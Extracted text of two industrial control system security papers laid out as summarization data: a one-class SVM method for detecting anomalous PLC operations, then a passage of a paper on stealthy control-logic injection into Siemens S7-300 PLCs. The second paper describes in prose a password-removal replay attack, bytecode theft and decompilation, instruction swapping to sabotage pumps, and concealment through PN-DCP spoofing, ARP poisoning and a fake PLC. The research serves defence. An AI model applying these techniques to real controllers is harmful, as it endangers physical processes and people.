PLC attacker s intentions can be determined by monitoring the memory addresses of user control program [16]. They identified the memory addresses used from the program code, and then monitored and recorded the values of the addresses by PLC Logger as a file (stored with normal PLC behavior). Based on the clear file, they can determine if the PLC is running normally or being attacked. Ken Yau and KP Chow have proposed two solutions to perform PLC forensics. The first solution was that they developed a Control Program Logic Change Detector (CPLCD) [14]. It worked with a set of Detection Rules (DRs) to detect and record undesired incidents, the incidents were interfering with the normal operations of PLC. The DRs were defined based on the PLC user control program. CPLCD program worked with the defined DRs to monitor memory variables of the control program to detect PLC Control Program Change Attack and PLC Memory Read and Write Logic Attack . Their second solution was that, they proposed to capture values of relevant memory addresses used by PLC control program as a data log file. Based on the log file, supervised machine learning was applied to identify anomalous PLC operations [15]. All the solutions mentioned above are able to detect malicious behavior of a specific PLC, and some solutions use supervised machine learning. However, they are not generic solutions. Investigator must fully understand PLC control program logics before applying these solutions to determine anomalous PLC behavior. Since each PLC installed with different control programs for different applications and some programs are extremely complicated, therefore, investigators are not easy to apply the above solutions to the real PLC control systems. Furthermore, it takes time to label large set of training data when using supervised machine learning. VI. E XPERIMENTAL SETUP AND METHODOLOGY This section describes the experimental setup and the proposed methodology for identifying PLC anomalous operations. A. Experimental Setup The experiments used a Siemens S7-1212C PLC loaded with the traffic light control program (TLIGHT) (Section IIA). The values of relevant memory addresses used by TLIGHT were captured in a log file via a program using the libnodave open sources library [18]. In particular, the program monitored the PLC memory addresses over the network and recorded the values along with their timestamps. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations. Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens Training Set 1 Trained Model Trained Model Test Set 2 Objects of specific class 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 582 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. S7 PLCs [19]. The overview of hardware experimental setup is shown in Fig. 4. Fig. 4. Overview of Hardware Experimental Setup B. Classifying Anomalous Behavior A machine learning technique typically splits the available dataset into two components: (i) training set for learning the properties of the data; and (ii) testing set for evaluating the learned properties of the data. The accuracy of the response prediction was evaluated based on the testing set [23]. An overview of PLC anomaly detection using OCSVM is shown in Fig 5 and the details are as follows: Step 1: To set up a simulated traffic light control system. The setup details are shown in Fig. 2. Step 2: To collect values of relevant memory addresses used by PLC program. To capture the values of relevant memory addresses used by PLC program in a log file. (Fig. 6). The memory addresses of traffic light control system are shown in Table I. The captured data in the log file was used for OCSVM model training. Step 3: To normalize the collected values as training set. To simplify the semi-supervised machine learning process, all the non-binary values of memory addresses (e.g., timers) were converted to binary values. Step 4: To train an OCSVM model by using the normalized values. To train a learning model, One-class SVM (sklearn.svm.OneClassSVM) of Scikit-learn is adopted. Scikit-learn is a free software machine learning library for the Python programming language [20]. Based on the training set of the captured data, OCSVM was applied to train a model. There are four kernel functions used in OCSVM which are Linear, Polynomial, Gaussian, and Sigmoid/Logistic. The kernels are functions used to define a similarity measure between two data points. After comparing the performance of the four kernel functions in our experiments, we found that the kernel Polynomial function provided higher accuracy of classification for the simulated traffic light control system. Polynomial Kernel: K(x,y) = (gamma*x*y + coef() ) ^ degree, the parameter settings are shown in Table II. Step 5: To create and collect PLC anomalous events for performance evaluation of the model. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations. Fig. 5. Overview of PLC Anomaly Detection using OCSVM Wireless AP Snap 7 Logging program PLC Switches Step 2 To collect values of relevant memory addresses used b y PLC program Step 3 To normalize the collected values as training set Step 4 To train an OCSVM model by using the normalized values Step 1 To set up a simulated traffic light control system Step 5 To create and collect PLC anomalous events for performance evaluation of the model Step 6 To evaluate the accuracy of the PLC anomaly detectio n 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 583 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. Fig. 6. Data log file TABLE II. INPUT PARAMETER SETTINGS OF SCIKIT -LEARN ONE-CLASS SVM (OCSVM) Para- meter description Value degree Degree of the polynomial kernel function 3 coef0 coefficients 4 nu An upper bound on the fraction of training errors and a lower bound of the fraction of support vectors. Should be in the interval (0, 1]. 0.1 gamma gamma defines how much influence a single training example. The larger the gamma is, the closer other examples must be to be affected. 0.1 Test sets were created by capturing the values of the PLC memory addresses while performing the simulated attacks. The test sets contained normal and anomalous PLC events. Step 6: To evaluate the accuracy of the PLC anomaly detection. To evaluate the accuracy of the One-class SVM classification, one training set and three test sets were collect from the simulated traffic light control system. The trained model was evaluated by sklearn.metrics [24] and the classification results with five performance metrics are shown in Table III. The brief descriptions of the metrics are as follows: Accuracy: The accuracy is the ratio (tp + tn) / (p + n) where tp is the number of true positives and fn is the number of false negatives. P is the number of real positive cases in the data and n is the number of real negative cases in the data. Precision: The precision is the ratio tp / (tp + fp) where tp is the number of true positives and fp is the number of false positives. The precision is intuitively the ability of the classifier not to label as positive a sample that is negative. The best value is 1 and the worst value is 0. Recall: The recall is the ratio tp / (tp + fn) where tp is the number of true positives and fn is the number of false negatives. The recall is intuitively the ability of the classifier to find all the positive samples. The best value is 1 and the worst value is 0. F1: Score can be interpreted as a weighted average of the precision and recall, where an F1 score reaches its best value at 1 and worst score at 0. AUC: Area Under the Curve (AUC) is prediction scores which measured by the area under the ROC curve. An area of 1 represents a perfect test; an area of 0.5 represents a worthless test. VII. D ISCUSSION In the experiment, we made an assumption that the training set data collected from the traffic light system was in normal operations (without any anomalous events). This assumption is not unreasonable as we can collect data of normal behavior of the PLC during testing and maintenance. From the experimental results, high accuracy and high AUC of PLC anomalous operation detection were obtained. Since our logging program captures memory addresses of PLC with time stamps, OCSVM together with the time stamps information can help forensic investigators to carry out investigation efficiently. OCSVM was able to detect the simulated traffic light anomalous behavior in a dataset after OCSVM model was trained. Since each dataset was recorded with time stamps, we could know the date and time about the PLC anomalous events. According to the time stamps and the values of memory addresses in the dataset, the scope of investigation can be narrowed down. For example, if any firmware or user control program was updated, or any attack during a particular period of time, the proposed solution can identify the date and time about the anomalous events. According to the experiments, we found that it is important to select a correct kernel function with appropriate values of the function parameters in order to obtain a more accurate result of PLC anomaly detection. In our experiments, we chose kernel function Polynomial and adjusted the parameter values as Table II for classifying anomalous operations of the simulated traffic light system. As different control systems have different operational behavior, therefore, we believe that kernel type and values of parameters may be different for different kinds of PLC control systems. Comparing with supervised machine learning for PLC anomaly detection, OCSVM may be a better solution when the training set data is large and complicated because the training data for OCSVM is not necessary to be labelled. Class labelling is not an easy task for large set of data 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 584 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. because it is time consuming and always need to be performed by control system s experts. VIII. CONCLUSION AND FUTURE WORK To overcome the challenges of PLC protection and forensic investigation, this paper proposes to use semi-supervised machine learning, One-class SVM (OCSVM), to detect PLC anomalous behavior based on the captured values of PLC memory addresses. Our experiment demonstrates that our solution is feasible and practical to apply to the traffic light control system. This paper is an initial step of applying semi-supervised machine learning for PLC anomaly detection. In future, we will evaluate the feasibility and increase the accuracy to detect PLC anomalous behavior by applying semi-supervised algorithm on various PLC applications in ICS. In addition, we will try to create a generic model for PLC anomaly detection even when the PLC control program is not provided. TABLE III. OCSVM CLASSIFICATION RESULTS OF TRAFFIC LIGHT CONTROL SYSTEM R EFERENCES [1] Irfan Ahmed, Sebastian Obermeier and Martin Naedele, Golen G. Richard III: SCADA System: Challenges for Forensics Investigations, IEEE Computer, Vol. 45 No. 12, pp 44 51, USA, 2012. [2] T. Spyridopoulos , T. Tryfonas , J. May ,Incident analysis & digital forensics in SCADA and industrial control systems, System Safety Conference incorporating the Cyber Security Conference, 8th IET International, 2013. [3] Dillon Beresford, Exploiting Siemens Simatic S7 PLCs, Black Hat USA, 2011. [4] W. Bolton, Programmable Logic Controllers (4th Edition), 2006. [5] Keith Stouffer,Victoria Pillitteri, Suzanne Lightman, Marshall Abrams, Adam Hahn, Guide to Industrial Control Systems (ICS) Security, NIST Special Publication 800-82 Revision 2, U.S. Department of Commerce, 2015. [6] Siemens, SIMATIC S7-300 Programmable Controller Quick Start, Primer, Preface, C79000-G7076-C500-01, Nuremberg, Germany, 1996. [7] Semi-supervised learning (https://en.wikipedia.org/wiki/Semi-supervised_learning), 2017. [8] H. Patzlaff, D 7.1 Preliminary Report on Forensic Analysis for Industrial Systems, CRISALIS Consortium, Symantec, Sophia Antipolis, France, 2013. [9] Fabro, M: Recommended Practice: Creating Cyber Forensic Plan for Control Systems, Department of Homeland Security (2008), Idaho National Laboratory (INL), USA, 2008. [10] Machine Learning: What it is and why it matters (www.sas.com/it_it/insights/analytics/machine-learning.html), 2017. [11] Machine Learning in MATLAB (www.mathworks.com/help/stats/machine-learning-in-matlab.html), 2017. [12] Introduction to One-class Support Vector Machines (rvlasveld.github.io/blog/2013/07/12/introduction-to-one-class- support-vector-machines/), Last accessed on 2 May 2017, 2017. [13] One-class classification.com (en.wikipedia.org/wiki/One-class_classification), 2017. [14] Ken Yau and Kam-Pui Chow, PLC Forensics based on control program logic change detection, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [15] Ken Yau and Kam-Pui Chow, Detecting Anomalous Programmable Logic Controller Events using Machine Learning, (to be appeared in the proceedings of) The 13th Annual IFIP WG 11.9 International Conference on Digital Forensics, Orlando, FL., February 2017. [16] Tina Wu and Jason R.C. Nurse, Exploring the use of PLC debugging tools for digital forensic investigations on SCADA system, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [17] Nicolas Falliere, Liam O Murchu, and Eric Chien: W32.Stuxnet Dossier, Version 1.4, Symantec Corporation, 2011. [18] T. Hergenhahn, libnodave (sourcefor ge.net/projects/libnodave), 2014. [19] D. Nardella, Step 7 Open Source Ethernet Communication Suite, Bari, Italy (snap7.sourceforge.net), 2016. [20] sklearn.svm.OneClassSVM (scikit- learn.org/stable/modules/generated/sklearn.svm.OneClassSVM.html), 2017. [21] Novelty and Outlier Detection (scikit- learn.org/stable/modules/outlier_detection.html#outlier-detection), 2017. [22] Godwin, J.L. and Matthews, P.C. and Watson, C., Classification and detection of electrical control system faults through SCADA data analysis, in Chemical engineering transactions. Volume 33. , pp. 985- 990, 2013. [23] scikit-learn Project, An Introduction to Machine Learning with scikit-l earn (scikit-learn.org/stable/tutorial/basic/tutorial.html), 2016. [24] sklearn.metrics: Metrics (scikit-learn.org/stable/modules/classes.html#sklearn-metrics-metrics), 2016. [25] Katherine Heller, Krysta Svore, Angelos D. Keromytis, Salvatore Stolfo, One Class Support Vector Machines for Detecting Anomalous Windows Registry Accesses, Columbia University Academic Commons, 2003. No. of Rec Accuracy Precision Recall F1 AUC Training Set 41580 0.96 1 0.96 0.98 n/a Test Set 1 5000 0.78 1 0.78 0.88 0.89 Test Set 2 7000 0.75 1 0.75 0.86 0.83 Test Set 3 13130 0.82 1 0.82 0.90 0.88 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 585 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply.
Summary:
Industrial Control System (ICS) is used to monitor and control critical infrastructures. Programmable logic controllers (PLCs) are major components of ICS, which are used to form automation system. It is important to protect PLCs from any attacks and undesired incidents. However, it is not easy to apply traditional tools and techniques to PLCs for security protection and forensics because of its unique architectures. Semi-supervised machine learning algorithm, One-class Support Vector Machine (OCSVM), has been applied successfully to many anomaly detection problems. This paper proposes a novel methodology to detect anomalous events of PLC by using OCSVM. The methodology was applied to a simulated traffic light control system to illustrate its effectiveness and accuracy. Our results show that high accuracy of identification of anomalous PLC operations is obtained which can help investigators to perform PLC forensics efficiently and effectively.
|
Summarize:
Index Terms S7-300 PLCs, Injection Attack, Stealthy Attack, Replay Attack, Fake PLC; I. INTRODUCTION Programmable logic controllers (PLCs) in industrial control systems (ICSs) are directly connected to physical processes such as production lines, electrical power grids and other critical plants. They are equipped with control logic that de nes how to monitor and control the behaviour of the pro- cesses. Thus, their safety, durability, and predictable response times are the primary design concerns. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each vendor has its own proprietary rmware, programming, communication protocols and main- tenance software. However, the basic hardware and software architecture is similar, meaning that all PLCs contain variables, and logic to control their inputs and outputs. The PLC code is written on an engineering station in the vendor s control logic language. The control logic is then compiled into an executable format, and downloaded to the PLC. The operating PLCs are monitored and managed via dedicated machines running Human Machine Interface (HMI) software. Modernnetworked PLCs and engineering stations are communicating over TCP/IP, but the higher-level protocols in use are typically proprietary. Siemens S7 PLCs in the Simatic family [1] are estimated to have over 30% in the worldwide PLC market [2]. Furthermore, the Simatic line of products includes the Totally Integrated Automation Portal (TIA), which functions as the engineering station. The TIA Portal and PLCs communicate over the S7 network protocol. Unfortunately, the majority of industrial controllers are not designed to be resilient against cyber- attacks. This means if a PLC is compromised, then the physical process controlled by the PLC is also compromised which eventually could lead to a disastrous incident. Stuxnet [3] is perhaps the most well-known attack on ICS. This malware used a windows PC to target Siemens S7-300 PLCs that are speci cally connected with variable frequency drives. It infects the control logic of the PLCs to monitor the frequency of the attached motors, and only launches an attack if the frequency is within a certain normal range (i.e. 807 Hz and 1,210 Hz). Our focus is to investigate the possibility of exploiting Siemens S7-300 PLCs by: First compromising the security of PLCs and altering the control logic program running. Second hiding the infected logic from the engineering software at the control center which can acquire the logic from the PLC remotely and reveal the infection of the control logic. Please note that compromising the ICS network is out of the scope of this work and can be achieved via typical attack vector in our IT world such as infected USB, vulnerable web server, etc. Finding PLCs connected directly to the Internet is an easy task using search engines such as Shodan, Censys etc. All our attack scenarios are network based, and can be successfully launched by any attacker with network access to the target PLC. The rest of the paper is organized as follows. Section II discusses related work, while our experimental setup is presented in section III. We illustrate our attack scenarios in IV , and discuss the results as well as future work in V . II. RELATED WORK Since 2010, ICSs, in particular their con guration and mon- itoring interfaces, have become targets for attackers. Recent examples of cyber-attacks on ICS occurred in Ukraine [4], [5]. These attacks caused controlling electrical distribution and wide-spread blackouts. In 2014, the German federal of ce for978-1-7281-5730-6/21/$31.00 2021 IEEE9862021 22nd IEEE International Conference on Industrial Technology (ICIT) | 978-1-7281-5730-6/20/$31.00 2021 IEEE | DOI: 10.1109/ICIT46573.2021.9453483 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:39 UTC from IEEE Xplore. Restrictions apply. information security announced a cyber-attack at an unnamed steel mill, where hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shot down, resulting in massive damage [6]. At black Hat USA 2015 Klick et al. [7] demonstrated injection of malware into the control logic of a Simatic S7-300 PLC, without the service disrupting. In a follow on work, Spen- neberg et al [8] presented a PLC worm. The worm spreads internally from one PLC to other target PLCs. During the infection phase the worm scans the network for new targets (PLCs). Both of the previous two works [7], [8] could be easily detected by the ICS operator once he requests the current control logic the target PLCs have. A Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [9]. Such malware is inserted by an attacker into existing control logic on PLCs. Anyway, this scenario requires from an attacker to be familiar with the programming languages that the PLC is programmed with. A recent work presented a reverse engineering-attack called ICSREF [10], which can automatically generate malicious payloads against the target system, and does not require any prior knowledge of the ICS. [11] demonstrated common-mode failure attacks targeting an industrial system that consists of redundant modules for recovery purpose. These modules are commonly used in nuclear power plant settings. The authors used DLL hijacking to intercept and modify the command-37 packets sent between the engineering station and the PLC, and could cause all the modules to fail. But this attack was also detectable by the ICS operator. A group of researchers in [12] presents a remote attack on the control logic of PLC. They were able to infect the PLC and to hide the infection from the engineering software at the control center. They implemented their attack on Schneider Electric Modicon M221, and its vendor-supplied engineering software (SoMachine-Basic). An- other work demonstrated a series of attacks targeting Siemens S7-1200 PLCs [13]. Their investigation involves attacks like session stealing, phantom PLC, cross connecting controllers and denial of S7 connections. Our work differs in that we run a more dif cult attack to be detected at the control center, as well as we use S7-300 PLCs which are larger deployed in industrial systems. III. EXPERIMENTAL SET-UP In this section, we describe our experimental set-up, starting with the process to be controlled and presenting the equipment used afterwards. A. The physical process to be controlled In our experiments, we are using the following application example: there are two aquariums lled with water that is pumped from one to the other until a certain level is reached and then the pumping direction is inverted see gure 1. The PLC is connected to the engineering station (TIA Portal) via an Ethernet cable, and exchanging data over the network to control the water level in each aquarium. The control process in this set-up is cyclically running as follows: Fig. 1: Example application of our control process The PLC reads the input signals coming from the sensors 1, 2, 3 and 4. The two upper sensors (Num. 1, 3) installed on both aquariums are reporting to the device when the aquariums are full of water, while the two lower sensors (Num. 2, 4) are reporting to the device when the aquariums are empty. Then the PLC powers the pumps on/off depending on the sensors readings received. B. Hardware Equipment In our testbed we have the following components: legitimate user, attacker machine, PLC, Communication processor, sen- sors and pumps which are described in detail in the following: 1. Legitimate User - It s a device that is connected to the PLC/CP using the TIA Portal software. Here, we use version 15.21and Windows 72as operating system. 2. Attacker Machine - it s a device that sneakily connects to the system without appropriate credentials. In our exper- iments, the attacker uses operating system LINUX Ubuntu 18.04.1 LTS3running on a Laptop4. 3. PLC S7-300 - as mentioned before, we use Siemens products in our experiments and, particularly a CPU from the 300 family. The PLC used in this work is S7 315-2 PN/DP5. 4. Four capacitive proximity Sensors - in our testbed, these are four sensors from Sick, Type CQ35-25NPP-KC166, with a sensing range of 25 mm and electrical wiring DC 4- wire. 1https://support.industry.siemens.com/cs/document/109752566/simatic- step-7-and-wincc-v15-trial-download-?dti=0& lc=en-US. 2https://www.microsoft.com/de-de/software-download/windows7. 3https://ubuntu.com/download/desktop. 4https://www.dell.com/support/home/de/de/debsdt1/productsupport/product/ latitude-e6510/overview. 5https://support.industry.siemens.com/cs/pd/480032?pdti=td& dl=en& lc=en-WW. 6https://www.sick.com/de/en/proximity-sensors/capacitive- proximitysensors/cq/cq35-25npp-kc1/p/p244267.987 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:39 UTC from IEEE Xplore. Restrictions apply. 5. Two Pumps here, two DC-Runner 1.1 from Aqua Medic7with transparent pump housing 0-10 v connection for external control, maximum pumping output 1200 I/h and maximum pumping height: 1.5m. C. Attacker Model and Attack Surface With regard to the types of attacks we consider, we assume that the attacker has already access to the network and is capable to send packets to the target via port number 102 at the S7 315-2PN/DP CPU. We also assume that the attacker has no TIA Portal software installed nor any prior knowledge about the actual process controlled by the PLC, how the PLC is connected, which communication protocol the PLC uses, or the logic program running on. In this work, the attack surface is a combination of device design and software implementation; more precisely, it is the implementation of the network stack, PLC speci c protocol and PLC operating system. IV. A TTACK DESCRIPTION As a consequence of the existing and already reported vulnerabilities, an attacker might carry out several attacks targeting industrial settings. Figure 2 shows an overview of the ve attack scenarios that we perform in this work which consist of: - Compromising the security of PLCs. - Stealing control logic programs from PLCs. - Decompiling the stolen byte code to STL source code. - Infecting the control logic code. - Hiding the ongoing injection attack from the ICS opera- tor. In the following we illustrate in detail all the ve above- mentioned attack scenarios conducted against our example application given in section III. A. Compromising the security measures of PLCs Siemens PLCs are normally password protected to prevent any unauthorized access and tampering of the logic programs running in their devices. Thus, it is not allowed to read/write from and to a controller without knowing the 8 characters password that a PLC is protected with. According to the best of our knowledge, most of the previous works mentioned two possibilities to bypass the password. Either by extracting the hash of the password and then pushing it back to the PLC (reply attack) [14], or using a representative list of plain-text password, encoded-text password pairs to brute-force each byte of ine (brute-force attack) [17]. In this work, we also use a replay attack, but to remove the password that the PLC is set with, without any change in the current con guration of the target PLC. A typical replay attack on the PLC consists of recording a sequence of packets related to a certain request/respond sent by the TIA Portal/PLC, and then pushing the captured/crafted packets back to the target at a later time without authorization. 7https://www.aquariumspecialty.com/aqua-medic-dc-runner-1-2- pump.html.Technically, when a password is written to an S7-300 PLC, it is actually embedded in the SDB block which is de ned by the static bytes: 0x3042, precisely in the block number 0000: 0x30303030 as shown in gure 3 [17]. Therefore, before any function or command is executed, the load process rst checks SDB0 block (0x304230303030) to see if a password is already set. We have here two cases: 1) The PLC has no password and we can easily set a new password by sending an old captured load process sequence between the PLC and the TIA Portal which contains the setting of a new password. 2) The PLC has already one and we want either to update it with a new one, or to remove the password at all. In this work we are just interested in the second case i.e. when the PLC is already password protected. Fig. 3: S7-300 PLC memory structure For this scenario the block SDB0 has a password and to update/remove the password, the old password should always be supplied by the user before any changes are done. Due to the fact that when the legitimate user updates the PLC with a new password, the PLC cannot overwrite the new password in the SDB0 directly. This means the PLC rst needs to clear this block from its previous content, and then writes the new password into the block. This interesting nding triggered the idea that we can manipulate the setting of the password using the sequence of an old load process captured during updating an old password with a new one. For achieving this, we did the following: we rst opened the TIA Portal, and changed the password in the con guration setting of the PLC. Then we downloaded the new con guration to the PLC providing the old password as a regular operation. In parallel, we recorded the entire load process between the TIA Portal and the PLC using Wireshark as a network sniffer. After recording the load process, we ltered the resulting packets keeping only the packets which are in charge of deleting the content of block SDB0 and ignoring the rest of packets which write the new password into SDB0. Similar to what Beresford presented in [14], we created our own load session by replacing the corresponding packets of updating a new password with only those needed to delete block SDB0, and eventually pushed our crafted packets sequence back to the target PLC as a new988 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:39 UTC from IEEE Xplore. Restrictions apply. Fig. 2: High-level overview of our attack scenarios load process. After the replay attack is done, we found that the PLC got updated and is no longer password protected. Algorithm 1 describes the core of our python script used to perform this attack. Our script is based on Scapy features and not only used to bypass the authentication of the PLC, but also to perform different replay attacks by replacing the corresponding captured/crafted packet for the attack presented in the next subsections. B. Stealing the Bytecode from the PLC After the security measures are compromised, we commu- nicate with the exposed PLC using a Python-snap7 library, and request the control logic running in the target device. This step is easy to be done by using the function full_upload (type, block number) from the Python-snap7 library. For our example application, we managed successfully to upload the program running in the PLC on the attacker machine by replacing the above-mentioned function s parameters with the corresponding block name and number i.e. we set the parameters on OB and 1 respectively.C. Decompiling the Bytecode to STL Code In the next step, the Bytecode set and the corresponding STL instruction set of the user program running in the PLC need to be identi ed. For achieving that, we applied an of ine division method to extract all the instructions used in our program one by one as follows. We opened the TIA Portal software, and programmed our target PLC with a certain code consisting of 10 times the same instruction. Here, we used the instruction NOP 0 which has no effect on the program. After that we downloaded this code to our PLC and recorded the packets containing the Bytecode which is the representation of 10 NOP 0 instructions as shown in gure 4a. We could identify that each NOP 0 instruction is represented as OxF000 in the Bytecode. Afterwards we opened the normal program (used in our example application) in the TIA Portal software and inserted NOP 0 before and after each instruction, and then downloaded the new program to the PLC. We recorded the packets that contain this new Bytecode, and identi ed each Hex-byte representing each instruction as shown in gure 4b. After extracting all instructions with the corresponding Hex-989 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:39 UTC from IEEE Xplore. Restrictions apply. Bytes, we created a small Mapping Database of pairs: Hex- Bytes to their corresponding STL instructions, and used this mapping Database to convert the original machine Bytecode to its STL source code online. However, although our map- ping database is very limited to the instructions used in our program, this method could be developed to map all Hex- Bytes to their STL instructions for any logic control program. Figure 5 presents the online mapping process, which takes the content of the code block (OB1) as input and utilizes the created Mapping-Database to retrieve the STL logic program, while gure 6 shows the S7 upload message captured by the attacker machine and the corresponding STL instruction on the TIA Portal station. D. Infecting the control logic code After a successful decompiling, an attacker now has suf - cient knowledge of the control process running in the PLC, and all needed to corrupt the system is as easy as replacing one or more instructions by new ones. In our case, our program has two outputs (2 pumps) and modifying any switch/sensor status that a pump reads will corrupt the physical process and make the system work incorrectly e.g. for aquarium.1 in our example application, swapping the low sensor switch %I4.4 (Normal-opened) with the high sensor switch %I4.3 (Normal- closed) will confuse the process as pump.1 turns off and on before the water reaches the required levels. This could lead to a physical damage in a real industrial system. Figure 7 shows that the user and the attacker bytecodes captured by Wireshark vary in only four bytes. Please note that in this scenario, the infected code size remains the same as the original one as we just swapped instructions without adding any new ones i.e. the code size was not increased as well as the cycle time remains the same when executing the attacker code. (a) NOP instruction and the corresponding Bytecode (b) Inserting NOP instructions in the Bytecode Fig. 4: An example of NOP division method Fig. 5: The mapping process of the machine Bytecode to STL source code It s worth mentioning that an attacker might skip the de- compiling process and just replaces the original machine code with a totally new one even without knowing the program that the PLC runs. This holds true just in case there are no security means implemented which check changes in the code size, cycle time, etc. However, our method can cope with such protection mechanisms but on other hand the ICS operator can easily detect this attack if he requests and compares the online code run in the infected PLC with the of ine code that he has on the TIA Portal. E. Advanced Stealthy Injection Attack To overcome the challenge of keeping an ongoing injection attack hidden, we present a new method based on replacing the infected PLC with a fake one displayed for the ICS operator. Technically, the TIA Portal provides the user with the ability to compare the online code running in the remote PLC with990 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:39 UTC from IEEE Xplore. Restrictions apply. Fig. 6: S7 Upload message: Mapping the Bytecode with STL instructions Fig. 7: Modifying the PLC s Bytecode the of ine one that the user has at the control center. This reveals any infection of the control logic. The main goal of our approach is to hinder the operator from uploading the actual infected code from the remote PLC by redirecting its connection to our fake PLC, which sends the uninfected version that we want the user to see. This hides our ongoing injection and achieves a full stealth attack. This scenario can be realized by using our MITM system (see gure 2) which is initiated after the attacker penetrated the ICS network and can send/receive messages to/from the TIA Portal/PLC remotely. 1)Impersonating a real PLC :An interesting fact that we found in our investigation is that the ICS operator can be tricked by connecting him to a fake PLC (Attacker machine) impersonating the real remote device. This is because of the existing vulnerability of PN-DCP protocol (Data link layer). The PN-DCP protocol is basically used for discovering devices or con guring devices names, IP addresses, etc. TIA Portal requests all accessible devices in the network by broadcasting a certain packet called identify all , and all S7 PLCs available will replay with a certain respond packet called identify ok . The payload of the respond packet sent by each PLC contains all details of the device e.g. the name, IP address, vendor s name, subnets, etc. In this work, we aim at blocking the TIA Portal from reaching the remote PLC and connecting it to a fake PLC instead. This is done as follows: we recorded both"identify all" and "identify ok" packets between the TIA Portal and the remote PLC from during an old session, then modi ed the respond packet of the real PLC replacing the IP address of the PLC 192.168.0.1 with the IP address of our fake PLC 192.168.0.3. For a real scenario, we rst implement our MITM system between the TIA Portal and the target PLC, so all the packets transferred between the two remote stations will go rst through our MITM system and are then redirected depending on the attacker s ARP table (ARP Poisoning attack). After- wards our MITM system sends an "identify all" packet through the network (see gure 8a), and the remote PLC responses by sending the identify ok packet back to the attacker as shown in gure 8b. Once the TIA Portal sends a new "identify all" packet through the network in an attempt to connect with the remote PLC, our MITM system listens to the network, identi es the request and drops the packet to prevent the real PLC from responding to this request, and then sends our crafted identify ok packet back to the TIA Portal as shown in gure 8c. Thus, the TIA Portal registers our fake PLC as the real PLC located at 192.168.0.3. Please note that the only difference between the real and crafted identify ok packets is the IP addresses. The next step the legitimate user takes after nding an accessible PLC (which is in fact our fake PLC), he attempts991 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:39 UTC from IEEE Xplore. Restrictions apply. (a) Identify all request message from the attacker to the PLC (b) Identify ok respond message sent from the PLC to the attacker (c) identify ok respond message sent from the attacker to TIA Portal Fig. 8: PN-DCP protocol messages to establish an online session by initiating a TCP connection. Our MITM system will redirect the request to our fake PLC s IP address and establishes a TCP connection with the TIA Portal. After a successful connection, we need to keep the session between the TIA Portal and our fake PLC alive. Our investigation to solve this problem showed that S7-300 PLCs keep the online session with TIA Portal alive by exchanging four speci c packets8along the time the user is online. Meaning that we only need to keep sending the two PLC s respond packets (S7Comm [response] & TCP [ACK]) which are suf cient to keep our connection alive with the TIA Portal. The ICS operator could potentially spot the abnormality in case he checks the differences in the IP address between the real PLC and the fake PLC. As shown in gure 9, there are differences in the IP addresses between the real PLC and our fake PLC that are displayed in the TIA Portal. But in normal operation this impersonating might go undetected as the IP address is only shown if the operator explicitly checks details of the Pro net interface, which is not required during an ongoing operation. 2)Transferring the Original logic to the TIA Portal : As we mentioned earlier once the ICS operator suspects that the remote PLC runs a different logic program than that it should run, he will request the current logic program (online program) and compare it with the one that he has on the TIA Portal (of ine program). This allows him to detect any potential infection/modi cation. To trick this security check out, we recorded an old upload session between the TIA Portal and the remote PLC, and then modi ed the packets captured during the security check by the original code instead of the 81. S7Comm: POSCTR:[Request]. 2. S7Comm POSCTR: [Response]. 3. COTP TPDU (0). 4. TCP [ACK] (a) CPU s online diagnostic before the attack (b) CPU s online diagnostic after the attack Fig. 9: Different IP addresses shown in TIA Portal infected code. For a real scenario, once the ICS operator sends a new upload request over the network, our MITM system drops this request and sends our crafted load sequence back using the python script presented in algorithm 1. We managed successfully to upload the original code from the attacker machine to the TIA Portal while the PLC runs another code. This stealthy attack could cause signi cant harm in the relevant ICSs as the of ine and online programs are matching fully and the engineer will not detect our ongoing injection attack unless he checks the IP address of the connected device in the Pro net interface. Figure 10 shows that both the of ine and online programs are identical during our ongoing injection attack. V. DISCUSSION AND FUTURE WORK In this paper, we presented an advanced stealthy attack scenario, for infecting the control logic including vulnera- bility exploitation, decompilation, injection, and concealment of the infection via a fake PLC approach. For a practical implementation we performed all our attack scenarios on real hardware/software used in industrial settings. We found that the ICS operator is able to detect this attack only if he checks the IP address of the connected device, taking into account that he needs to check the details of the Pro net interface, which is normally not required during an ongoing control operation. However, to mitigate the effect of such attacks we highly suggest some countermeasures to our attack such as protection and detecting of control logic. The rst step to protect our systems from various sorts of attacks is to improve the isolation from other networks [15], combining this with standard security practices [16], and even defence-in-depth security in the control systems. In addition, a digital signature should be employed not only to the rmware as most of the992 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:39 UTC from IEEE Xplore. Restrictions apply. Fig. 10: Online and Of ine control logic comparison shown in TIA Portal PLC vendors do but also to the control logic. Furthermore, a mechanism to check the protocol header which contains information about the type of the payload is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. Finally, Siemens provides their devices with Multi-Point Interface (MPI) to communicate with other 